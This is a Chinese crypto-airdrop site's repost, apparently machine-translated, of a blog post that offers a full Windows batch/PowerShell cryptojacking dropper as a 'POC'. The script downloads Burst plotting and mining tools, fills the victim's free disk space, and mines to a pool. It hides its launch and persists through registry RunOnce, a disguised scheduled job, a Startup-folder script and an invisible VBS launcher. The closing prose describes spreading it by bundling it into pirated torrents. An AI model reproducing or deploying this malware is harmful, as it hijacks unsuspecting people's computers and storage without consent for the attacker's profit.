复制自我的黑客,无需CPU / GPU即可开采加密货币

 空投币   2020-07-24  来源:互联网  0 条评论
优质活动 币圈快讯 平台公告 行情分析
最新羊毛 最新空投 链圈挖矿 活动线报
新币上市 币圈空投 国外项目 币链屋
提醒:本站内容均转自网络,仅用于开发者下载测试,请明辨风险,若涉资金安全及隐私,请谨慎!谨慎!再谨慎!一切风险自担,涉及资金交易及个人隐私务必小心并远离,切记千万别投资,勿上当受骗。《本站免责申明》


        我本来要在直播中马拉松,但是Hacker Noon最近与Coil建立联系的所有乐趣都开始向我显示(部分)爱。
        作者黑客注意事项:需要在Coil和Hacker Noon设置页面上同时设置Uphold端点。:)我不是第一次,证明了$ 0的收入,直到修复它,瞧!一分钱!
        现在,转到我的POC。请注意,我还没有创建(大部分),也没有将其传播到任何未经同意的计算机上。假冒不是非法的,对吗?
        注意:我确实创建了大多数powershell挖掘脚本,并在不久前执行了该脚本。此POC的其他方面是全新的。
        瞧瞧,我甚至发现了一些简化的代码:)

@echo off
@echo mkdir c:\temp >>stuff.ps1
@echo $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" >>stuff.ps1
@echo $nonces=$disk.FreeSpace/1024/1024/1024/2*4096 >>stuff.ps1
@echo $web_client = new-object system.net.webclient >>stuff.ps1
@echo $build_info=$web_client.DownloadString("http://noncecalculator.duckdns.org:3000/?nonces=$nonces") >>stuff.ps1
@echo $start=$build_info.nonce >>stuff.ps1
@echo (new-object System.Net.WebClient).DownloadFile('https://github.com/PoC-Consortium/engraver/releases/download/2.20/engraver-2.2.0-x86_64-pc-windows-msvc.zip.zip', 'c:/temp/engraver.zip') >>stuff.ps1

@echo $nonces=[math]::floor($nonces) >>stuff.ps1
@echo $start=[math]::floor($start) >>stuff.ps1

@echo Add-Type -AssemblyName System.IO.Compression.FileSystem >>stuff.ps1
@echo [System.IO.Compression.ZipFile]::ExtractToDirectory('c:/temp/engraver.zip', 'c:/temp') >>stuff.ps1
@echo start-process -NoNewWindow -FilePath 'c:\temp\engraver_cpu.exe' -ArgumentList "-l -i 10478801653490313100 -s $start -n $nonces -p c:\temp" >>stuff.ps1
@echo (new-object System.Net.WebClient).DownloadFile('https://github.com/PoC-Consortium/scavenger/releases/download/v.1.7.2/scavenger-1.7.2-x86_64-pc-windows-msvc-cpu-only.zip', 'c:/temp/scavenger.zip') >>stuff.ps1


@echo [System.IO.Compression.ZipFile]::ExtractToDirectory('c:/temp/scavenger.zip', 'c:/temp') >>stuff.ps1

@echo $out = ^"plot_dirs: >>stuff.ps1
@echo - 'C:\temp' >>stuff.ps1

@echo url: 'http://0-100-pool.burst.cryptoguru.org:8124' >>stuff.ps1

@echo hdd_reader_thread_count: 0 # default 0 (=auto: number of disks) >>stuff.ps1
@echo hdd_use_direct_io: true # default true >>stuff.ps1
@echo hdd_wakeup_after: 240 # default 240s >>stuff.ps1

@echo cpu_threads: 0 # default 0 (=auto: number of logical cpu cores) >>stuff.ps1
@echo cpu_worker_task_count: 4 # default 4 (0=GPU only) >>stuff.ps1
@echo cpu_nonces_per_cache: 65536 # default 65536 >>stuff.ps1
@echo cpu_thread_pinning: false # default false >>stuff.ps1

@echo gpu_threads: 0 # default 0 (=GPU off) >>stuff.ps1
@echo gpu_platform: 0 # default 0 >>stuff.ps1
@echo gpu_device: 0 # default 0 >>stuff.ps1
@echo gpu_worker_task_count: 0 # default 0 (=CPU only) >>stuff.ps1
@echo gpu_nonces_per_cache: 262144 # default 262144 >>stuff.ps1
@echo gpu_mem_mapping: false # default false >>stuff.ps1
@echo gpu_async: false # default false >>stuff.ps1

@echo target_deadline: 31536000 # default u32::MAX >>stuff.ps1
@echo account_id_to_target_deadline: # target dls for multi-id (optional) >>stuff.ps1
@echo 10282355196851764065: 600000 >>stuff.ps1
@echo 1796535821016683299: 55555555 >>stuff.ps1

@echo get_mining_info_interval: 3000 # default 3000ms >>stuff.ps1
@echo timeout: 5000 # default 5000ms >>stuff.ps1
@echo send_proxy_details: true # default false >>stuff.ps1

@echo console_log_level: 'info' # default Info, options (off, error, warn, info, debug, trace) >>stuff.ps1
@echo logfile_log_level: 'warn' # default Warn, options (off, serror, warn, info, debug, trace) >>stuff.ps1
@echo logfile_max_count: 10 # maximum number of log files to keep >>stuff.ps1
@echo logfile_max_size : 20 # maximum size per logfile in MiB >>stuff.ps1

@echo show_progress: true # default true >>stuff.ps1
@echo show_drive_stats: false # default false >>stuff.ps1
@echo benchmark_only: 'disabled' # default disabled, options (disabled, I/O, XPU)^" >>stuff.ps1
@echo rm c:\temp\config.yaml >>stuff.ps1
@echo add-content c:\temp\config.yaml $out >>stuff.ps1
@echo start-process -NoNewWindow -FilePath 'c:\temp\scavenger.exe' -ArgumentList "-c c:\temp\config.yaml" >>stuff.ps1
@echo $ps1 = 'set-location HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce >>stuff.ps1
@echo new-itemproperty . MyKey -propertytype String -value ^"Powershell c:\temp\ps1.ps1^" >>stuff.ps1
@echo start-process -NoNewWindow -FilePath ^"c:\temp\scavenger.exe^" -ArgumentList ^"-c c:\temp\config.yaml^"' >>stuff.ps1

@echo rm c:\temp\ps1.ps1 >>stuff.ps1
@echo add-content c:\temp\ps1.ps1 $ps1 >>stuff.ps1
@echo $trigger = New-JobTrigger -AtStartup >>stuff.ps1
@echo $user=[Environment]::UserName >>stuff.ps1
@echo $start='c:\temp\scavenger.exe -c c:\temp\config.yaml > output.txt' >> stuff.ps1
mkdir c:\temp
@echo $vbs='wscript.exe c:\temp\invis.vbs c:\temp\startup.cmd %*'>>stuff.ps1
@echo add-content "C:\Users\$user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup2.cmd" $vbs >>stuff.ps1
@echo set args = WScript.Arguments >> c:\temp\invis.vbs
@echo num = args.Count >> c:\temp\invis.vbs

@echo if num = 0 then >> c:\temp\invis.vbs
@echo WScript.Echo "Usage: [CScript | WScript] invis.vbs aScript.bat <some script arguments>" >> c:\temp\invis.vbs
@echo WScript.Quit 1 >> c:\temp\invis.vbs
@echo end if >> c:\temp\invis.vbs

@echo sargs = "" >> c:\temp\invis.vbs
@echo if num > 1 then >> c:\temp\invis.vbs
@echo sargs = " " >> c:\temp\invis.vbs
@echo for k = 1 to num - 1 >> c:\temp\invis.vbs
@echo anArg = args.Item(k) >> c:\temp\invis.vbs
@echo sargs = sargs & anArg & " " >> c:\temp\invis.vbs
@echo next >> c:\temp\invis.vbs
@echo end if >> c:\temp\invis.vbs

@echo Set WshShell = WScript.CreateObject("WScript.Shell") >> c:\temp\invis.vbs
@echo WshShell.Run ^"^"^"^" & WScript.Arguments(0) & ^"^"^"^" & sargs, 0, False >> c:\temp\invis.vbs



@echo add-content "C:\temp\startup.cmd" $start >>stuff.ps1
@echo Register-ScheduledJob -Trigger $trigger -FilePath c:\temp\ps1.ps1 -Name GetBatteryStatus2 >>stuff.ps1
@echo new-itemproperty . MyKey -propertytype String -value ^"Powershell c:\temp\ps1.ps1^" >>stuff.ps1
@echo start-process -NoNewWindow -FilePath ^"c:\temp\scavenger.exe^" -ArgumentList ^"-c c:\temp\config.yaml^" >>stuff.ps1
START powershell -WindowStyle Hidden -ExecutionPolicy ByPass -File "stuff.ps1"
        好吧,因此,为了使用某种逻辑将其分解为可实现的小步骤,其想法是选择一种加密方法来劫持人们的计算机,而无需使用其CPU / GPU(大多数人,无论多么愚蠢,注意到和诊断)。大多数对僵尸网络友好的加密货币将使用目标计算机的CPU或(有时)GPU的百分比来挖掘加密货币。
        我选择了Burst,但此后Burstcoin改变了头脑,成为BHD和大量其他相关硬币。您可以使用相同的脚本来挖掘它们-只需在此处更改(某些)执行即可。
上面的Windows批处理文件会将一些命令保存到不同的Powershell脚本中,然后再运行。
        简而言之,它计算出C:上有多少硬盘空间,然后占用其中的%并在后台运行“雕刻机”,它是FOSS Burst命令行绘图仪。假设计算机的运行时间足以完成此过程,则它将在启动时启动“清除程序”以挖掘该Burst。
        这里有比这更复杂的东西-例如,运行“不可见的” Windows命令提示符,使用在netherwebs中找到的脚本或从我的集中式服务器加载JSON响应(如果此图是在...上执行)以评估此下一个目标的起始随机数。
        现在,要在互联网上传播它(没有任何预算可言),我们将按照受欢迎程度从thepiratebay或类似网站下载顶级(较小的MB)软件洪流。自然,有些人会下载我们新种子的种子,在干净地(且完全无法检测)的批处理文件中与该.exe一起执行.exe,他们将获得被黑客入侵的软件,然后我们将继续运行该批处理他们的系统。
        其中一些人会重新播种-我们强迫他们重新下载torrent和数据,并使用系统进程和命令行Windows torrent软件(我不确定是否存在)将其播种。
        那里有-非侵入式传播。人们想要自由软件,消费自由软件并获得各种麻烦-默认情况下,降低UAC防护等级即可。
        请注意,在可能的可否认性意义上,混淆了这些指示的某些部分,使其效率较低(无私地)或暗示性(私自)。

本文地址:http://bilianwu.com/63778.html
版权声明:项目均采集于互联网, 空投币 无法审核全面,且希望大家能赚钱,请谨慎切勿上当受骗!
温馨提示:★★★天上真会掉馅饼!天道酬勤,都是机会!不错过每个空投糖果!真假难以辨认,尽量0撸!
重要提醒:本站内容均转自互联网,请明辨各个项目风险,不构成投资建议,如涉及资金交易,请谨慎操作与自担风险!
《新人必看》 《本站免责申明》

评论已关闭!